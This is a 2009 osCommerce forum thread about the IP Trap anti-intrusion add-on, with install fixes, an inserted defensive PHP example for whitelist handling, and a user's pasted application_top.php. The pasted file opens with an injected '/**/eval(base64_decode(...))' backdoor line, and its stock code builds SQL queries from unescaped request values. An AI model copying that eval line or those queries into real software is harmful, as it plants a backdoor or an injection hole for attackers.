Biancoblu Posted October 24, 2009: Thanks for trying Leslie. I have now added your IP to the whitelist, can you try again and see if you get redirected to index.php please? ~ Don't mistake my kindness for weakness ~
Guest Posted October 24, 2009 (edited): Quoting Biancoblu: "Thanks for trying Leslie. I have now added your IP to the whitelist, can you try again and see if you get redirected to index.php please?" I got to your site so I am not banned (thank you), then I went to "the" folder and was redirected to the home page. So, for me it worked as expected. PS I tried IE6 and FF. PPS on my site I copied the contents of "the" directory to a new folder called admin. Edited October 24, 2009 by Coopco
FIMBLE (Author) Posted October 24, 2009: @ Les That's a really good idea, I like it! Nic. Sometimes you're the dog and sometimes the lamp post
Biancoblu Posted October 24, 2009: Thanks for testing Leslie, and I agree with Nic, what you did with the folder is an excellent idea.
Mort-lemur Posted October 29, 2009: Hi, firstly I think this is a great contribution. One question though - can I use this as another layer of security to prevent anyone not on the whitelist from trying to access my admin files? Am I being too simplistic in thinking I just need to add another line to the disallows in the robots file? Thanks. Now running on a fully modded, Mobile Friendly 2.3.4 Store with the Excellent MTS installed - See my profile for the mods installed ..... So much thanks for all the help given along the way by forum members.
FIMBLE (Author) Posted October 29, 2009: Hi, thank you. Hmmm, interesting question! In theory no, as there is already an index.php page in the admin folder, as this is what it relies upon. Now you have me intrigued so I will have a look at it. Nic
madstarr Posted November 12, 2009: Quoting Guest: "I got to your site so I am not banned (thank you), then I went to "the" folder and was redirected to the home page. So, for me it worked as expected. PS I tried IE6 and FF. PPS on my site I copied the contents of "the" directory to a new folder called admin." Can you explain better what you mean by copied the contents of "the" directory to a new folder called admin? I understand the theory and I like it, just not sure what I need to do differently. Thank you.
Guest Posted November 13, 2009: Quoting madstarr: "Can you explain better what you mean by copied the contents of "the" directory to a new folder called admin? I understand the theory and I like it, just not sure what I need to do differently. Thank you." I had previously renamed the admin folder to something else, like you need to do to help secure your site. At this point, no admin folder. I then copied the contents of the folder that is used by IP trap (I do not want to name it here; if you install the contribution you should be able to work out what it is) to a new folder called admin. So if someone goes fishing for the admin of my site, they will get banned. No honest person would be looking for my admin, so I do not want them on my site. I have some others set up. Their names are other hacking attempt folders as determined by what appears in my 404 error pages.
Goaul Posted November 17, 2009: Will this addon also be for osCommerce 3.x? Or at least some short manual on how to add it to work for that version?
FIMBLE (Author) Posted November 17, 2009: Quoting Goaul: "Will this addon also be for osCommerce 3.x? Or at least some short manual on how to add it to work for that version?" Hi, it has not been tested on version 3 as yet, so I'm not sure. Nic
rafael-cdkeyhouse Posted December 1, 2009: Hi, I have just installed the V4 and I get this error: Parse error: syntax error, unexpected $end in /home/*****/public_html/includes/application_top.php on line 523 I have this on line 523: $products = tep_db_fetch_array($products_query);
FIMBLE (Author) Posted December 4, 2009: An unexpected end usually means that a closing curly brace has been omitted. Check the code once again for this. Nic
altoid Posted December 9, 2009: Quoting Guest: "I then copied the contents of the folder that is used by IP trap (I do not want to name it here......." Nic - Leslie: I am finally getting around to installing the update. Regarding Leslie's concept, would appropriately modifying the robots.txt file to work with this strategy be a good idea?? i.e. the disallow approach. Thanks. I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can. I remember what it was like when I first started with osC. It can be overwhelming. However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc. There are several good pros here on osCommerce. Look around, you'll figure out who they are.
FIMBLE (Author) Posted December 9, 2009: Quoting altoid: "Nic - Leslie: I am finally getting around to installing the update. Regarding Leslie's concept, would appropriately modifying the robots.txt file to work with this strategy be a good idea?? i.e. the disallow approach. Thanks" Hi, yes, add the admin folder if this is what you will rename the personal folder to. I have an update out to protect the admin folder (or wherever you have your admin folder); I will release it soon. There are a few who have tested this for me already and it works fine, just a simple change to make it work too. Nic
altoid Posted December 9, 2009: Quoting FIMBLE: "Hi, yes, add the admin folder if this is what you will rename the personal folder to. I have an update out to protect the admin folder (or wherever you have your admin folder); I will release it soon. There are a few who have tested this for me already and it works fine, just a simple change to make it work too. Nic" Thanks...will do and will watch for the update also. Much appreciated.
sky_diver Posted December 14, 2009: Quoting Goaul: "Will this addon also be for osCommerce 3.x? Or at least some short manual on how to add it to work for that version?" Why would you want to flood V3 with incomplete downloads? I think we have all seen enough of that with the current Milestones.
Lacocinadebabette Posted December 22, 2009: Hi, I have installed the IP trap and I'm not sure it is working properly (www.lacocinadebabette.com/tienda). I've added one IP address to the IP trapped folder and I still see it around. I've added mine and if it is first, it bans me, but if it is second it doesn't. Have I done something wrong? Thanks in advance. All best, Beatriz
FIMBLE (Author) Posted December 22, 2009: Hi, did you add the code to the application_top.php? Nic
altoid Posted December 23, 2009: Quoting FIMBLE: "Hi, yes, add the admin folder if this is what you will rename the personal folder to. I have an update out to protect the admin folder (or wherever you have your admin folder); I will release it soon. There are a few who have tested this for me already and it works fine, just a simple change to make it work too. Nic" Nic, got a catch today using the trap. I looked through my log to see what occurred; it appears the visitor picked my site up in another forum topic dealing with the admin security matter. I put my site link there, probably shouldn't have in hindsight. Since then I enabled a bunch of security measures including the "trap". I am still on the uphill side of learning, but in the log I see a lot of action from the blocked IP. It appears he/she looked around a bit, then I see a GET nibble at the "admin" folder. It appears the block comes in the next line then. I ran the IP and it didn't come back to a search engine that I am aware of. I am not sure, but it looks like he/she went back and tried coming in through that first link again. I don't fully grasp the log data but I think I get the gist of this. So this may have been a hack attempt? Why else be interested in Admin? Am I interpreting this correctly? Thanks
Guest Posted December 23, 2009: Hi Fimble, excellent contribution, thank you. For me the whitelist was not working because the end of line characters can be different on servers. So I fixed it in personal/index.php to remove the added end of line character "\n" from the IP address of the curious visitor, and used rtrim to remove the end of line characters from the array elements read from the file. Now it works for me.
eclyptik Posted December 27, 2009: Hi community, I have a problem with the installation of IP trap V4. I have this message after installation. I don't understand, please help me; I need to block many bad spiders and robots on my new site. I use osc2.2 RC2, and I have no catalog folder but everything directly in the root folder. << Warning: file() [function.file]: Unable to access DOCUMENT_ROOT/../banned/IP_Trapped.txt in /home/eclyptik/www/starboutik/includes/secret.php on line 11 Warning: file(DOCUMENT_ROOT/../banned/IP_Trapped.txt) [function.file]: failed to open stream: No such file or directory in /home/eclyptik/www/starboutik/includes/secret.php on line 11 Warning: Invalid argument supplied for foreach() in /home/eclyptik/www/starboutik/includes/secret.php on line 13 Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers >> Thank you in advance, Loic
FIMBLE (Author) Posted December 27, 2009: Hi, have you set the permissions for the files as per the instructions?
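An added example (not the IP Trap contribution's own code) covering the two problems raised above: the whitelist comparison that only worked once line endings were rtrim()-ed, and the file()/foreach() warnings when the banned list cannot be opened. It assumes the banned/IP_Trapped.txt path from the quoted warnings, a hypothetical IP_Whitelist.txt beside it, and a 403 response for banned addresses (the contribution's own response may differ).

```php
<?php
// Added example, not the IP Trap contribution's code. Two points from the thread:
//  1. Lines read with file() keep their terminator ("\n" or "\r\n" depending on how
//     the file was saved), so an exact comparison against an address fails unless the
//     terminator is stripped. rtrim($line, "\r\n") handles both endings.
//  2. The quoted warning shows the literal path "DOCUMENT_ROOT/../banned/...": a bare
//     DOCUMENT_ROOT word is an undefined constant that PHP (pre-8) silently turns into
//     the string "DOCUMENT_ROOT" (the E_NOTICE is masked by application_top.php's
//     error_reporting(E_ALL & ~E_NOTICE)). file() then returns false and foreach()
//     emits "Invalid argument supplied". Use $_SERVER['DOCUMENT_ROOT'] and guard the read.

// File locations (assumption: the banned directory sits one level above the web root,
// as in the warning quoted above; the whitelist file name is hypothetical).
define('IP_TRAP_BANNED_FILE',    $_SERVER['DOCUMENT_ROOT'] . '/../banned/IP_Trapped.txt');
define('IP_TRAP_WHITELIST_FILE', $_SERVER['DOCUMENT_ROOT'] . '/../banned/IP_Whitelist.txt');

// Read one address per line. Always returns an array, never false, so callers can
// loop over it safely even when the file is missing or unreadable.
function ip_trap_read_list($path) {
    if (!is_readable($path)) {
        return array();
    }
    $lines = file($path);
    if ($lines === false) {
        return array();
    }
    $out = array();
    foreach ($lines as $line) {
        $ip = rtrim($line, "\r\n");       // strip LF or CRLF, nothing else
        if ($ip !== '') {                  // ignore blank lines
            $out[] = $ip;
        }
    }
    return $out;
}

// Strict comparison: "1.2.3.4" must not match "1.2.3.4\r" or "1.2.3.40".
function ip_trap_is_listed($ip, $path) {
    return in_array($ip, ip_trap_read_list($path), true);
}

// Called from the trap folder's index.php (personal/index.php in the post above).
// Records the visitor unless whitelisted; returns true when the address was trapped.
function ip_trap_record($ip) {
    if (ip_trap_is_listed($ip, IP_TRAP_WHITELIST_FILE)) {
        return false;
    }
    if (!ip_trap_is_listed($ip, IP_TRAP_BANNED_FILE)) {
        // Exactly one "\n" terminator per entry; the reader strips it again.
        // LOCK_EX keeps two simultaneous hits from interleaving their writes.
        file_put_contents(IP_TRAP_BANNED_FILE, $ip . "\n", FILE_APPEND | LOCK_EX);
    }
    return true;
}

// Called early on every store page (where the thread says the application_top.php
// code goes). Whitelisted addresses are never blocked, as Biancoblu's test relied on.
function ip_trap_enforce($ip) {
    if (ip_trap_is_listed($ip, IP_TRAP_WHITELIST_FILE)) {
        return;
    }
    if (ip_trap_is_listed($ip, IP_TRAP_BANNED_FILE)) {
        header('HTTP/1.1 403 Forbidden');   // assumption: the contribution may do otherwise
        exit;
    }
}

// Example wiring for the trap folder's index.php: record, then send the visitor back
// to the store front, which is the redirect behaviour described in the thread.
if (basename(__FILE__) === 'index.php') {
    ip_trap_record($_SERVER['REMOTE_ADDR']);
    header('Location: ../index.php');
    exit;
}
?>
```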
dunn Posted December 28, 2009: Hello Fimble, I am stuck trying to figure out where line 56 is in my application_top.php. It scares me every time I have to install a contribution that my site will be down. But luckily I have developed a fail-safe way of downloading the actual php file before making any changes to it. Anyway, I was able to fend off early an attack by the /**/eval(base64_decode virus, so I have extended lines. Can you identify which would be the lines preceding it?

<? /**/eval(base64_decode('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')); ?>
<?php
/*
  $Id: application_top.php 1833 2008-01-30 22:03:30Z hpdl $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright © 2008 osCommerce

  Released under the GNU General Public License
*/

// start the timer for the page parse time log
  define('PAGE_PARSE_START_TIME', microtime());

// set the level of error reporting
  error_reporting(E_ALL & ~E_NOTICE);

// check support for register_globals
  if (function_exists('ini_get') && (ini_get('register_globals') == false) && (PHP_VERSION < 4.3) ) {
    exit('Server Requirement Error: register_globals is disabled in your PHP configuration. This can be enabled in your php.ini configuration file or in the .htaccess file in your catalog directory. Please use PHP 4.3+ if register_globals cannot be enabled on the server.');
  }

// Set the local configuration parameters - mainly for developers
  if (file_exists('includes/local/configure.php')) include('includes/local/configure.php');

// include server parameters
  require('includes/configure.php');

  if (strlen(DB_SERVER) < 1) {
    if (is_dir('install')) {
      header('Location: install/index.php');
    }
  }

// define the project version
  define('PROJECT_VERSION', 'osCommerce Online Merchant v2.2 RC2a');

// some code to solve compatibility issues
  require(DIR_WS_FUNCTIONS . 'compatibility.php');

// set the type of request (secure or not)
  $request_type = (getenv('HTTPS') == 'on') ? 'SSL' : 'NONSSL';

// set php_self in the local scope
  if (!isset($PHP_SELF)) $PHP_SELF = $HTTP_SERVER_VARS['PHP_SELF'];

  if ($request_type == 'NONSSL') {
    define('DIR_WS_CATALOG', DIR_WS_HTTP_CATALOG);
  } else {
    define('DIR_WS_CATALOG', DIR_WS_HTTPS_CATALOG);
  }

// include the list of project filenames
  require(DIR_WS_INCLUDES . 'filenames.php');

// include the list of project database tables
  require(DIR_WS_INCLUDES . 'database_tables.php');

// customization for the design layout
  define('BOX_WIDTH', 125); // how wide the boxes should be in pixels (default: 125)

// include the database functions
  require(DIR_WS_FUNCTIONS . 'database.php');

// make a connection to the database... now
  tep_db_connect() or die('Unable to connect to database server!');

// set the application parameters
  $configuration_query = tep_db_query('select configuration_key as cfgKey, configuration_value as cfgValue from ' . TABLE_CONFIGURATION);
  while ($configuration = tep_db_fetch_array($configuration_query)) {
    define($configuration['cfgKey'], $configuration['cfgValue']);
  }

// if gzip_compression is enabled, start to buffer the output
  if ( (GZIP_COMPRESSION == 'true') && ($ext_zlib_loaded = extension_loaded('zlib')) && (PHP_VERSION >= '4') ) {
    if (($ini_zlib_output_compression = (int)ini_get('zlib.output_compression')) < 1) {
      if (PHP_VERSION >= '4.0.4') {
        ob_start('ob_gzhandler');
      } else {
        include(DIR_WS_FUNCTIONS . 'gzip_compression.php');
        ob_start();
        ob_implicit_flush();
      }
    } else {
      ini_set('zlib.output_compression_level', GZIP_LEVEL);
    }
  }

// set the HTTP GET parameters manually if search_engine_friendly_urls is enabled
  if (SEARCH_ENGINE_FRIENDLY_URLS == 'true') {
    if (strlen(getenv('PATH_INFO')) > 1) {
      $GET_array = array();
      $PHP_SELF = str_replace(getenv('PATH_INFO'), '', $PHP_SELF);
      $vars = explode('/', substr(getenv('PATH_INFO'), 1));
      for ($i=0, $n=sizeof($vars); $i<$n; $i++) {
        if (strpos($vars[$i], '[]')) {
          $GET_array[substr($vars[$i], 0, -2)][] = $vars[$i+1];
        } else {
          $HTTP_GET_VARS[$vars[$i]] = $vars[$i+1];
        }
        $i++;
      }

      if (sizeof($GET_array) > 0) {
        while (list($key, $value) = each($GET_array)) {
          $HTTP_GET_VARS[$key] = $value;
        }
      }
    }
  }

// define general functions used application-wide
  require(DIR_WS_FUNCTIONS . 'general.php');
  require(DIR_WS_FUNCTIONS . 'html_output.php');

// set the cookie domain
  $cookie_domain = (($request_type == 'NONSSL') ? HTTP_COOKIE_DOMAIN : HTTPS_COOKIE_DOMAIN);
  $cookie_path = (($request_type == 'NONSSL') ? HTTP_COOKIE_PATH : HTTPS_COOKIE_PATH);

// include cache functions if enabled
  if (USE_CACHE == 'true') include(DIR_WS_FUNCTIONS . 'cache.php');

// include shopping cart class
  require(DIR_WS_CLASSES . 'shopping_cart.php');

// include navigation history class
  require(DIR_WS_CLASSES . 'navigation_history.php');

// check if sessions are supported, otherwise use the php3 compatible session class
  if (!function_exists('session_start')) {
    define('PHP_SESSION_NAME', 'osCsid');
    define('PHP_SESSION_PATH', $cookie_path);
    define('PHP_SESSION_DOMAIN', $cookie_domain);
    define('PHP_SESSION_SAVE_PATH', SESSION_WRITE_DIRECTORY);

    include(DIR_WS_CLASSES . 'sessions.php');
  }

// define how the session functions will be used
  require(DIR_WS_FUNCTIONS . 'sessions.php');

// set the session name and save path
  tep_session_name('osCsid');
  tep_session_save_path(SESSION_WRITE_DIRECTORY);

// set the session cookie parameters
  if (function_exists('session_set_cookie_params')) {
    session_set_cookie_params(0, $cookie_path, $cookie_domain);
  } elseif (function_exists('ini_set')) {
    ini_set('session.cookie_lifetime', '0');
    ini_set('session.cookie_path', $cookie_path);
    ini_set('session.cookie_domain', $cookie_domain);
  }

// set the session ID if it exists
  if (isset($HTTP_POST_VARS[tep_session_name()])) {
    tep_session_id($HTTP_POST_VARS[tep_session_name()]);
  } elseif ( ($request_type == 'SSL') && isset($HTTP_GET_VARS[tep_session_name()]) ) {
    tep_session_id($HTTP_GET_VARS[tep_session_name()]);
  }

// start the session
  $session_started = false;
  if (SESSION_FORCE_COOKIE_USE == 'True') {
    tep_setcookie('cookie_test', 'please_accept_for_session', time()+60*60*24*30, $cookie_path, $cookie_domain);

    if (isset($HTTP_COOKIE_VARS['cookie_test'])) {
      tep_session_start();
      $session_started = true;
    }
  } elseif (SESSION_BLOCK_SPIDERS == 'True') {
    $user_agent = strtolower(getenv('HTTP_USER_AGENT'));
    $spider_flag = false;

    if (tep_not_null($user_agent)) {
      $spiders = file(DIR_WS_INCLUDES . 'spiders.txt');
      for ($i=0, $n=sizeof($spiders); $i<$n; $i++) {
        if (tep_not_null($spiders[$i])) {
          if (is_integer(strpos($user_agent, trim($spiders[$i])))) {
            $spider_flag = true;
            break;
          }
        }
      }
    }

    if ($spider_flag == false) {
      tep_session_start();
      $session_started = true;
    }
  } else {
    tep_session_start();
    $session_started = true;
  }

  if ( ($session_started == true) && (PHP_VERSION >= 4.3) && function_exists('ini_get') && (ini_get('register_globals') == false) ) {
    extract($_SESSION, EXTR_OVERWRITE+EXTR_REFS);
  }

// set SID once, even if empty
  $SID = (defined('SID') ? SID : '');

// verify the ssl_session_id if the feature is enabled
  if ( ($request_type == 'SSL') && (SESSION_CHECK_SSL_SESSION_ID == 'True') && (ENABLE_SSL == true) && ($session_started == true) ) {
    $ssl_session_id = getenv('SSL_SESSION_ID');
    if (!tep_session_is_registered('SSL_SESSION_ID')) {
      $SESSION_SSL_ID = $ssl_session_id;
      tep_session_register('SESSION_SSL_ID');
    }

    if ($SESSION_SSL_ID != $ssl_session_id) {
      tep_session_destroy();
      tep_redirect(tep_href_link(FILENAME_SSL_CHECK));
    }
  }

// verify the browser user agent if the feature is enabled
  if (SESSION_CHECK_USER_AGENT == 'True') {
    $http_user_agent = getenv('HTTP_USER_AGENT');
    if (!tep_session_is_registered('SESSION_USER_AGENT')) {
      $SESSION_USER_AGENT = $http_user_agent;
      tep_session_register('SESSION_USER_AGENT');
    }

    if ($SESSION_USER_AGENT != $http_user_agent) {
      tep_session_destroy();
      tep_redirect(tep_href_link(FILENAME_LOGIN));
    }
  }

// verify the IP address if the feature is enabled
  if (SESSION_CHECK_IP_ADDRESS == 'True') {
    $ip_address = tep_get_ip_address();
    if (!tep_session_is_registered('SESSION_IP_ADDRESS')) {
      $SESSION_IP_ADDRESS = $ip_address;
      tep_session_register('SESSION_IP_ADDRESS');
    }

    if ($SESSION_IP_ADDRESS != $ip_address) {
      tep_session_destroy();
      tep_redirect(tep_href_link(FILENAME_LOGIN));
    }
  }

// only trust a session ID from the URL if refered
// from this site
  if ( isset($HTTP_SERVER_VARS['HTTP_REFERER']) || tep_session_is_registered('first_referred_by') ) {
    $referrer = parse_url($HTTP_SERVER_VARS['HTTP_REFERER']);
    if ( ( HTTP_COOKIE_DOMAIN != substr('.' . $referrer['host'], -1 * strlen(HTTP_COOKIE_DOMAIN)) ) && ( HTTPS_COOKIE_DOMAIN != substr('.' . $referrer['host'], -1 * strlen(HTTPS_COOKIE_DOMAIN)) ) && ( $SID == tep_session_name() . '=' . $HTTP_GET_VARS[tep_session_name()] ) ) {
      if ( function_exists('session_regenerate_id') ) {
        session_regenerate_id();
        $SID = (defined('SID') ? SID : '');
        if ( isset($HTTP_GET_VARS[tep_session_name()]) ) unset($HTTP_GET_VARS[tep_session_name()]);
        $_SESSION = array();
      }
    }

    if ( isset($HTTP_SERVER_VARS['HTTP_REFERER']) && ! tep_session_is_registered('first_referred_by') ) {
      tep_session_register('first_referred_by');
      $first_referred_by = $HTTP_SERVER_VARS['HTTP_REFERER'];
    }
  }

// create the shopping cart & fix the cart if necesary
  if (tep_session_is_registered('cart') && is_object($cart)) {
    if (PHP_VERSION < 4) {
      $broken_cart = $cart;
      $cart = new shoppingCart;
      $cart->unserialize($broken_cart);
    }
  } else {
    tep_session_register('cart');
    $cart = new shoppingCart;
  }

// include currencies class and create an instance
  require(DIR_WS_CLASSES . 'currencies.php');
  $currencies = new currencies();

// include the mail classes
  require(DIR_WS_CLASSES . 'mime.php');
  require(DIR_WS_CLASSES . 'email.php');

// set the language
  if (!tep_session_is_registered('language') || isset($HTTP_GET_VARS['language'])) {
    if (!tep_session_is_registered('language')) {
      tep_session_register('language');
      tep_session_register('languages_id');
    }

    include(DIR_WS_CLASSES . 'language.php');
    $lng = new language();

    if (isset($HTTP_GET_VARS['language']) && tep_not_null($HTTP_GET_VARS['language'])) {
      $lng->set_language($HTTP_GET_VARS['language']);
    } else {
      $lng->get_browser_language();
    }

    $language = $lng->language['directory'];
    $languages_id = $lng->language['id'];
  }

// include the language translations
  require(DIR_WS_LANGUAGES . $language . '.php');

// Ultimate SEO URLs v2.1
  if ((!defined(SEO_ENABLED)) || (SEO_ENABLED == 'true')) {
    include_once(DIR_WS_CLASSES . 'seo.class.php');
    if ( !is_object($seo_urls) ){
      $seo_urls = new SEO_URL($languages_id);
    }
  }

// currency
  if (!tep_session_is_registered('currency') || isset($HTTP_GET_VARS['currency']) || ( (USE_DEFAULT_LANGUAGE_CURRENCY == 'true') && (LANGUAGE_CURRENCY != $currency) ) ) {
    if (!tep_session_is_registered('currency')) tep_session_register('currency');

    if (isset($HTTP_GET_VARS['currency']) && $currencies->is_set($HTTP_GET_VARS['currency'])) {
      $currency = $HTTP_GET_VARS['currency'];
    } else {
      $currency = (USE_DEFAULT_LANGUAGE_CURRENCY == 'true') ? LANGUAGE_CURRENCY : DEFAULT_CURRENCY;
    }
  }

// navigation history
  if (tep_session_is_registered('navigation') && is_object($navigation)) {
    if (PHP_VERSION < 4) {
      $broken_navigation = $navigation;
      $navigation = new navigationHistory;
      $navigation->unserialize($broken_navigation);
    } else {
      $navigation = new navigationHistory;
    }
  } else {
    tep_session_register('navigation');
    $navigation = new navigationHistory;
  }

  $navigation->add_current_page();

#  /*if (tep_session_is_registered('navigation')) {
#    if (PHP_VERSION < 4) {
#      $broken_navigation = $navigation;
#      $navigation = new navigationHistory;
#      $navigation->unserialize($broken_navigation);
#    }
#  } else {
#    tep_session_register('navigation');
#    $navigation = new navigationHistory;
#  }
#  $navigation->add_current_page();
#*/

// Shopping cart actions
  if (isset($HTTP_GET_VARS['action'])) {
// redirect the customer to a friendly cookie-must-be-enabled page if cookies are disabled
    if ($session_started == false) {
      tep_redirect(tep_href_link(FILENAME_COOKIE_USAGE));
    }

    if (DISPLAY_CART == 'true') {
      $goto = FILENAME_SHOPPING_CART;
      $parameters = array('action', 'cPath', 'products_id', 'pid');
    } else {
      $goto = basename($PHP_SELF);
      if ($HTTP_GET_VARS['action'] == 'buy_now') {
        if (isset($HTTP_GET_VARS['product_to_buy_id'])) {
          $parameters = array('action', 'pid', 'product_to_buy_id');
        } else {
          $parameters = array('action', 'pid', 'products_id');
        }
      } else {
        $parameters = array('action', 'pid');
      }
    }

    switch ($HTTP_GET_VARS['action']) {
      // customer wants to update the product quantity in their shopping cart
      case 'update_product' :
        for ($i=0, $n=sizeof($HTTP_POST_VARS['products_id']); $i<$n; $i++) {
          if (in_array($HTTP_POST_VARS['products_id'][$i], (is_array($HTTP_POST_VARS['cart_delete']) ? $HTTP_POST_VARS['cart_delete'] : array()))) {
            $cart->remove($HTTP_POST_VARS['products_id'][$i]);
          } else {
            if (PHP_VERSION < 4) {
              // if PHP3, make correction for lack of multidimensional array.
              reset($HTTP_POST_VARS);
              while (list($key, $value) = each($HTTP_POST_VARS)) {
                if (is_array($value)) {
                  while (list($key2, $value2) = each($value)) {
                    if (ereg ("(.*)\]\[(.*)", $key2, $var)) {
                      $id2[$var[1]][$var[2]] = $value2;
                    }
                  }
                }
              }
              $attributes = ($id2[$HTTP_POST_VARS['products_id'][$i]]) ? $id2[$HTTP_POST_VARS['products_id'][$i]] : '';
            } else {
              $attributes = ($HTTP_POST_VARS['id'][$HTTP_POST_VARS['products_id'][$i]]) ? $HTTP_POST_VARS['id'][$HTTP_POST_VARS['products_id'][$i]] : '';
            }
            $cart->add_cart($HTTP_POST_VARS['products_id'][$i], $HTTP_POST_VARS['cart_quantity'][$i], $attributes, false);
          }
        }
// {{ buySAFE Module
        $WantsBond = ($HTTP_POST_VARS['WantsBond'] ? $HTTP_POST_VARS['WantsBond'] : $HTTP_SESSION_VARS['WantsBond']);
// }}
        tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters)));
        break;
      // customer adds a product from the products page
      case 'add_product' :
//.........Technokraft Start ShopCart code......//
        if (isset($HTTP_POST_VARS['products_id']) && is_numeric($HTTP_POST_VARS['products_id'])) {
          $cart->add_cart($HTTP_POST_VARS['products_id'], $cart->get_quantity(tep_get_uprid($HTTP_POST_VARS['products_id'], $HTTP_POST_VARS['id']))+1, $HTTP_POST_VARS['id']);
        }
//.........End Technokraft ShopCart code......//
        tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters)));
        break;
      // performed by the 'buy now' button in product listings and review page
      case 'buy_now' :
        if (isset($HTTP_GET_VARS['product_to_buy_id'])) {
          if (tep_has_product_attributes($HTTP_GET_VARS['product_to_buy_id'])) {
            tep_redirect(tep_href_link(FILENAME_PRODUCT_INFO, 'products_id=' . $HTTP_GET_VARS['product_to_buy_id']));
          } else {
            $cart->add_cart($HTTP_GET_VARS['product_to_buy_id'], $cart->get_quantity($HTTP_GET_VARS['product_to_buy_id'])+1);
          }
        } elseif (isset($HTTP_GET_VARS['products_id'])) {
          if (tep_has_product_attributes($HTTP_GET_VARS['products_id'])) {
            tep_redirect(tep_href_link(FILENAME_PRODUCT_INFO, 'products_id=' . $HTTP_GET_VARS['products_id']));
          } else {
            $cart->add_cart($HTTP_GET_VARS['products_id'], $cart->get_quantity($HTTP_GET_VARS['products_id'])+1);
          }
        }
//.........Start Technokraft ShopCart code......//
        tep_redirect(html_entity_decode(tep_href_link($goto, tep_get_all_get_params($parameters))));
//.........End Technokraft ShopCart code......//
        break;
      case 'notify' :
        if (tep_session_is_registered('customer_id')) {
          if (isset($HTTP_GET_VARS['products_id'])) {
            $notify = $HTTP_GET_VARS['products_id'];
          } elseif (isset($HTTP_GET_VARS['notify'])) {
            $notify = $HTTP_GET_VARS['notify'];
          } elseif (isset($HTTP_POST_VARS['notify'])) {
            $notify = $HTTP_POST_VARS['notify'];
          } else {
            tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action', 'notify'))));
          }
          if (!is_array($notify)) $notify = array($notify);
          for ($i=0, $n=sizeof($notify); $i<$n; $i++) {
            $check_query = tep_db_query("select count(*) as count from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $notify[$i] . "' and customers_id = '" . $customer_id . "'");
            $check = tep_db_fetch_array($check_query);
            if ($check['count'] < 1) {
              tep_db_query("insert into " . TABLE_PRODUCTS_NOTIFICATIONS . " (products_id, customers_id, date_added) values ('" . $notify[$i] . "', '" . $customer_id . "', now())");
            }
          }
          tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action', 'notify'))));
        } else {
          $navigation->set_snapshot();
          tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL'));
        }
        break;
      case 'notify_remove' :
        if (tep_session_is_registered('customer_id') && isset($HTTP_GET_VARS['products_id'])) {
          $check_query = tep_db_query("select count(*) as count from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $HTTP_GET_VARS['products_id'] . "' and customers_id = '" . $customer_id . "'");
          $check = tep_db_fetch_array($check_query);
          if ($check['count'] > 0) {
            tep_db_query("delete from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $HTTP_GET_VARS['products_id'] . "' and customers_id = '" . $customer_id . "'");
          }
          tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action'))));
        } else {
          $navigation->set_snapshot();
          tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL'));
        }
        break;
      case 'cust_order' :
        if (tep_session_is_registered('customer_id') && isset($HTTP_GET_VARS['pid'])) {
          if (tep_has_product_attributes($HTTP_GET_VARS['pid'])) {
            tep_redirect(tep_href_link(FILENAME_PRODUCT_INFO, 'products_id=' . $HTTP_GET_VARS['pid']));
          } else {
            $cart->add_cart($HTTP_GET_VARS['pid'], $cart->get_quantity($HTTP_GET_VARS['pid'])+1);
          }
        }
        tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters)));
        break;
    }
  }

// include the who's online functions
  require(DIR_WS_FUNCTIONS . 'whos_online.php');
  tep_update_whos_online();

// include the password crypto functions
  require(DIR_WS_FUNCTIONS . 'password_funcs.php');

// include validation functions (right now only email address)
  require(DIR_WS_FUNCTIONS . 'validations.php');

// split-page-results
  require(DIR_WS_CLASSES . 'split_page_results.php');

// infobox
  require(DIR_WS_CLASSES . 'boxes.php');

// auto activate and expire banners
  require(DIR_WS_FUNCTIONS . 'banner.php');
  tep_activate_banners();
  tep_expire_banners();

// auto expire special products
  require(DIR_WS_FUNCTIONS . 'specials.php');
  tep_expire_specials();

// auto expire featured products
  require(DIR_WS_FUNCTIONS . 'featured.php');
  tep_expire_featured();

// Bestseller Box
// auto expire bestseller products
  require(DIR_WS_FUNCTIONS . 'bestseller2.php');
  tep_expire_bestseller();
// Bestseller Box

// calculate category path
  if (isset($HTTP_GET_VARS['cPath'])) {
    $cPath = $HTTP_GET_VARS['cPath'];
  } elseif (isset($HTTP_GET_VARS['products_id']) && !isset($HTTP_GET_VARS['manufacturers_id'])) {
    $cPath = tep_get_product_path($HTTP_GET_VARS['products_id']);
  } else {
    $cPath = '';
  }

  if (tep_not_null($cPath)) {
    $cPath_array = tep_parse_category_path($cPath);
    $cPath = implode('_', $cPath_array);
    $current_category_id = $cPath_array[(sizeof($cPath_array)-1)];
  } else {
    $current_category_id = 0;
  }

// include the breadcrumb class and start the breadcrumb trail
  require(DIR_WS_CLASSES . 'breadcrumb.php');
  $breadcrumb = new breadcrumb;

  $breadcrumb->add(HEADER_TITLE_TOP, HTTP_SERVER);
  $breadcrumb->add(HEADER_TITLE_CATALOG, tep_href_link(FILENAME_DEFAULT));

// add category names or the manufacturer name to the breadcrumb trail
  if (isset($cPath_array)) {
    for ($i=0, $n=sizeof($cPath_array); $i<$n; $i++) {
      $categories_query = tep_db_query("select categories_name from " . TABLE_CATEGORIES_DESCRIPTION . " where categories_id = '" . (int)$cPath_array[$i] . "' and language_id = '" . (int)$languages_id . "'");
      if (tep_db_num_rows($categories_query) > 0) {
        $categories = tep_db_fetch_array($categories_query);
        $breadcrumb->add($categories['categories_name'], tep_href_link(FILENAME_DEFAULT, 'cPath=' . implode('_', array_slice($cPath_array, 0, ($i+1)))));
      } else {
        break;
      }
    }
  } elseif (isset($HTTP_GET_VARS['manufacturers_id'])) {
